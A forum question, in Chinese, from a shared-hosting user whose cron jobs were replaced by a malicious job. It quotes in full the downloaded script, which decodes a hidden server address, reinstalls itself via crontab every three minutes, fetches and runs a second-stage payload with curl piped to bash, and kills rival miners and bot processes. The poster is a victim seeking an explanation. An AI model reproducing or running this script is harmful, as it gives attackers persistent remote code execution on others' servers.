0

我所有的 cron 都从 godaddy 共享 cpanel 帐户中删除,并创建了一个新的 cron。cpanel 上的其余内容完好无损(意味着未删除或更改)。但是可以复制。

这是删除所有 cron 后在我的 cpanel 中列出的 cron。

curl -sk "http://static.megalodon.host/sync?time=1617860528" | bash > /dev/null 2>&1

同步文件的内容如下。由于我不是 Linux shell 脚本专家,所以我不明白这个脚本在做什么?

export OLDPWD=/
export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
declare -a EXCLUDES=( '104.152.52.22' '176.235.208.210' '95.216.118.244' '91.215.169.111' '193
.33.87.219' '49.88.112.117' '218.92.0.212' '222.186.31.135' '222.186.30.76' '5.188.134.78' '20.37.96.167' '106.12.18.225' '193.33.87.219')
REPO=$(echo aHR0cDovL3N0YXRpYy5tZWdhbG9kb24uaG9zdA== | base64 -d)
DP=$(dirname $(mktemp -u))

#cron
if (crontab -r) > /dev/null 2>&1;then
    cat > "$DP"/.sync.log << EOF
#unix
# * * * 9 * wget -q -O - http://195.3.146.118/ lol aziplcr72qjhzvin http://pastebin.com lol https://github.com lollololooo not work
*/3 * * * * curl -sk "$REPO/sync?time=$(date +%s)" | bash > /dev/null 2>&1

EOF
    if (crontab "$DP"/.sync.log) > /dev/null 2>&1;then
        echo "[!] SYNC : ENABLE !"
    else
        echo "[!] SYNC : DISABLE !"
     fi
else
   echo "[!] SYNC : NOT WORK !"
fi
#check
if (ps auxfe --sort=-pmem,-rss | grep '[-]unix-meta') > /dev/null 2>&1;then
     echo "[!] SKIP : CLIENT EXISTS !"
elif (netstat -taepn | grep  ':6667' | grep 'ESTABLISHED\|SYN_SENT') > /dev/null 2>&1;then
     echo "[!] SKIP : CLIENT EXISTS !"
elif [ -f "$DP/.vmlinuz.so" ] ;then
      echo "[!] SKIP : CLIENT EXISTS !"
elif [ -f "$DP/.vmlinuz.bin" ] ;then
      echo "[!] SKIP : CLIENT EXISTS !"
else
       echo "[!] CHECK CLIENT : FAILED - FORCE CALL!"
        if (curl -sk "$REPO/join?time=$(date +%s)" | bash |grep 'OK')> /dev/null 2>&1; then
              echo "[!] CALL CLIENT : COMPLETE"
        else
               echo "[X] CALL CLIENT : FAILED"
         fi
fi
#killing dog
if [[ $EUID -ne 0 ]];then
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[t]mp/k' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[F]OREGROUND' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[u]nix/' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[.]/gs' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[x]mri' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
else
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[t]mp/k' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[u]nix/' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[.]/gs' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
    for pid in $(ps auxfe --sort=-pmem,-rss | grep '[x]mri' | awk '{print $2}')
        do
            kill -9 "$pid" > /dev/null 2>&1
        done
fi
if $(netstat -V 2>/dev/null) > /dev/null 2>&1;
    then
    for exclude in "${EXCLUDES[@]}"
    do
        for pid in $(netstat -antp 2>/dev/null| grep "$exclude" | awk '{print $7}' | sed -e "s/\/.*//g")
           do
              kill -9 "$pid" > /dev/null 2>&1
         done
    done
fi```
4

0 回答 0